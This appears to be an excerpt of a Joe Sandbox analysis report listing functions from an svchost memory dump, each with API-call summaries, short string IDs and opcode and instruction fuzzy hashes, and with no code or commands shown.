                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                                      • String ID: api-ms-
                                                                      • API String ID: 2559590344-2084034818
                                                                      • Opcode ID: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction ID: 816ff74fe6477f5732722e6092750f562cc341bf4d63a227298854922a383655
                                                                      • Opcode Fuzzy Hash: 57a387126f3cdca2e6377dd9e1e04e2dfecb224b041c0cba2ac35bf939624b8e
                                                                      • Instruction Fuzzy Hash: ED31C339362A43E2EF51DF46A4207F52394B748BA0F990535DD2E4B790DF38C6458302
                                                                      Function 000001F2BD163790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                      • String ID: wr
                                                                      • API String ID: 1092925422-2678910430
                                                                      • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction ID: d3eef95f8e9797c62bd303372fc9d1d98ec5d0db309b4e4d04cd5f80355460af
                                                                      • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                      • Instruction Fuzzy Hash: D8113C7A724B4382FF549B61E4282F963A4F789B85F880139DE8907764EF3DC505C705
                                                                      Function 000001F2BD165B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Thread$Current$Context
                                                                      • String ID:
                                                                      • API String ID: 1666949209-0
                                                                      • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction ID: ee09959155a2eac8c82d5250b8b01ccc16e451735121b4104c9fa91c9d301f77
                                                                      • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                      • Instruction Fuzzy Hash: 42D18F7A215B8A81EB70DB15E4943EA7BA0F388B84F500126EECD47BA5DF3DC551CB01
                                                                      Function 000001F2BD162F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID: dialer
                                                                      • API String ID: 756756679-3528709123
                                                                      • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction ID: 7f80d1afa80db319671d8072da7637dd5eac392f218b8f1172c2418ba6a9fafe
                                                                      • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                      • Instruction Fuzzy Hash: 43319C3A721B53C2EB54CF66A5647FAA7A0FB44B84F888030DE4847B65EF38C4A5C701
                                                                      Function 000001F2BD16CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction ID: 9acd306c796429d848d5f20ad6bad8694a47334f45623fd279d62bd0269b48f1
                                                                      • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                      • Instruction Fuzzy Hash: F811AF3826628381FB64A7715A753F923526B987F0FA00734ED3A477E6DE78C4429703
                                                                      Function 000001F2BD16199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                      • String ID:
                                                                      • API String ID: 517849248-0
                                                                      • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction ID: 5c996072e7495a570841e87374aa50147b4650859bf0fccf7ad7f1c2ba7911ee
                                                                      • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                      • Instruction Fuzzy Hash: D4018CB1320A8382EB90DB52A8687E963A1F788FC1F884035DE4D43B65DF3CC989C701
                                                                      Function 000001F2BD1636C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                      • String ID:
                                                                      • API String ID: 449555515-0
                                                                      • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction ID: 7e45d6de1701cbc48d00c2f5e89c2684de88328f7a74c5b911fd512dc97d2502
                                                                      • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                      • Instruction Fuzzy Hash: 74012DB9321B4382EF659B62E8283FA73A0BB55B86F940538CD4907764EF3DC108C702
                                                                      Function 000001F2BD169005 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 135COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction ID: 87c6860d37f0f3b42e4d04458acec92380321f76e05e6566a8e7a1b9f8bd8476
                                                                      • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                      • Instruction Fuzzy Hash: 2351BEBA7216038BEB54DF15E468BF93796F348BA8FA18134DE0647788EB75C841C702
                                                                      Function 000001F2BD168FE8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 75COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                      • String ID: csm$f
                                                                      • API String ID: 2395640692-629598281
                                                                      • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction ID: 17ddcd350c3fbab4c69cdfef475f0483a489c2ef7412cbcd3883b63ab174adac
                                                                      • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                      • Instruction Fuzzy Hash: 5A31E07A32064387EB10DF11E8687E937A8F344BD8F958124EE4607799DB39C941C706
                                                                      Function 000001F2BD163044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CombinePath
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3422762182-91387939
                                                                      • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction ID: 1b3ecc0efa6a92ca3f3c221fe06cef17b10792bda2791879ca196cc9822a9c58
                                                                      • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                      • Instruction Fuzzy Hash: 14F01CB4728B8782EB548B53B9241F96761AB48FD0F889131EE4A47B68DF3CC449C702
                                                                      Function 000001F2BD16BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction ID: 771891675fd56f81d4029b47b866c1a450b575f78d7e4331bfb30d922d75a8a2
                                                                      • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                      • Instruction Fuzzy Hash: 1DF06DB5221B0781FB508B68E8643F96320FB89BA5FD44239DE6A462F4CF3CC188C311
                                                                      Function 000001F2BD1650D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction ID: a2ce81cf2cdac8cd3529f73802a6a72a0eb116d24f0474fd80187788a1aaa17d
                                                                      • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                      • Instruction Fuzzy Hash: BA02DD36229B8686E760CB55F4943AEBBA0F3C4784F504125EB8E47BA9DF7DC484CB01
                                                                      Function 000001F2BD165710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentThread
                                                                      • String ID:
                                                                      • API String ID: 2882836952-0
                                                                      • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction ID: 24dc54690249d3895b1b7c38b4582e1f8e2edf1faac8764183dfcb93513ee1e5
                                                                      • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                      • Instruction Fuzzy Hash: 1561CD3A629B87C6F760CB15E4643AA7BA4F388784F900125EE8D47BA8DB7DC450CF01
                                                                      Function 000001F2BD174104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction ID: c7ddc661428dab41173e4d3144494a3fabc548170c45f95645eedb0a9107dcdf
                                                                      • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                      • Instruction Fuzzy Hash: EE119EF2B70A5321F76565A8E8723F933446B683B8FD90634ED76266F68B38D8414202
                                                                      Function 000001F2BD16AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction ID: 302e9147bf9768ba2ee2bef3a396fc63e43c9e22c51b2e116c3aec92e75da88d
                                                                      • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                      • Instruction Fuzzy Hash: 32519E7A1213838AEB648F2595A43FD77A0F354B88F944126EE9947BD5CB38D490C70A
                                                                      Function 000001F2BD172058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                      • String ID:
                                                                      • API String ID: 2718003287-0
                                                                      • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction ID: d9d41c282d7b2ce4aabfec58e688f1acd234d9b95e1d190f9a901a1bb8711e21
                                                                      • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                      • Instruction Fuzzy Hash: 9AD102B2B24A8289E711CFB9D4503EC3BB1F355798F904226CE5E97BAADA34C507C341
                                                                      Function 000001F2BD1614A4 Relevance: 6.3, APIs: 5, Instructions: 38memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$Free
                                                                      • String ID:
                                                                      • API String ID: 3168794593-0
                                                                      • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction ID: d184098e54eec87762a1176ca5ed68c29c5bc5f7beb0174887d068f72f7a5b95
                                                                      • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                                      • Instruction Fuzzy Hash: BB0148B6620A93D6E784EF66E9182EA77A0F788F81F444435EE4A4372ADF38C451C741
                                                                      Function 000001F2BD172980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleErrorLastMode
                                                                      • String ID:
                                                                      • API String ID: 953036326-0
                                                                      • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction ID: 17a65dbcd4a12060c852e93996711d64427f50b652a06d50e707f5cc3a2a7ab4
                                                                      • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                      • Instruction Fuzzy Hash: 7A9104B2B2465389FB60DF6594A03FD3BE0F715B88F944129DE0A67AA5DB34C483C702
                                                                      Function 000001F2BD167960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                      • String ID:
                                                                      • API String ID: 2933794660-0
                                                                      • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction ID: 07055c1e54dafde211750482fff6b81622a8c3b3aaec0e8e3cdeaa1c6361cc99
                                                                      • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                      • Instruction Fuzzy Hash: C3112E76720F4289EB40CF60E8643F833A4F759758F840E31DE6D46BA4DB78D1988381
                                                                      Function 000001F2BD16253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction ID: a4e0a277eb074df162ec384e4e3874137e7a14a5b34a9f4edaae454dd5bfc79b
                                                                      • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                      • Instruction Fuzzy Hash: A171E33B220B8386E725DF26E8647FA6794F399B84FC40036DE0A57B89DE35C645C702
                                                                      Function 000001F2BD162330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: FileType
                                                                      • String ID: \\.\pipe\
                                                                      • API String ID: 3081899298-91387939
                                                                      • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction ID: 56eacd1cb70559ca7de4228d062e7ff752e37e0c1dc9b712038d02919abea6b6
                                                                      • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                      • Instruction Fuzzy Hash: 7F51F33A22878381E774DE2AA4783FAA791F3C6784FD40135DE5903B9ADE39C545C742
                                                                      Function 000001F2BD1726F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction ID: ccb3a4b7a4fba413b5e65f448ec0866b918ddff2e22582deebb6145b74459c80
                                                                      • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                      • Instruction Fuzzy Hash: E241C272725A8282EB60CF25E8543FAB7A0F798794F904035EE4D877A8EB3CC542C741
                                                                      Function 000001F2BD1694A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise
                                                                      • String ID: csm
                                                                      • API String ID: 2573137834-1018135373
                                                                      • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction ID: cb6d49408d700bcf134649fa86f529afd346d8d8b9871fd5f6248b902500e69f
                                                                      • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                      • Instruction Fuzzy Hash: 7C113D36224B8282EB618F15F4503A977E5F788B94F984221EE8C07769EF3CC555CB00
                                                                      Function 000001F2BD161BF4 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000044.00000002.2574623212.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_68_2_1f2bd160000_svchost.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocFree
                                                                      • String ID:
                                                                      • API String ID: 756756679-0
                                                                      • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction ID: 635b24736c22289d5cd47bd1db9a86048c3af2eb6c7f5d055bcc5ee3b73e71c1
                                                                      • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                                      • Instruction Fuzzy Hash: EB116A79621B4685EB44DB66A8282F977A1FB89FD0F984038DE4D43766DF38C8829301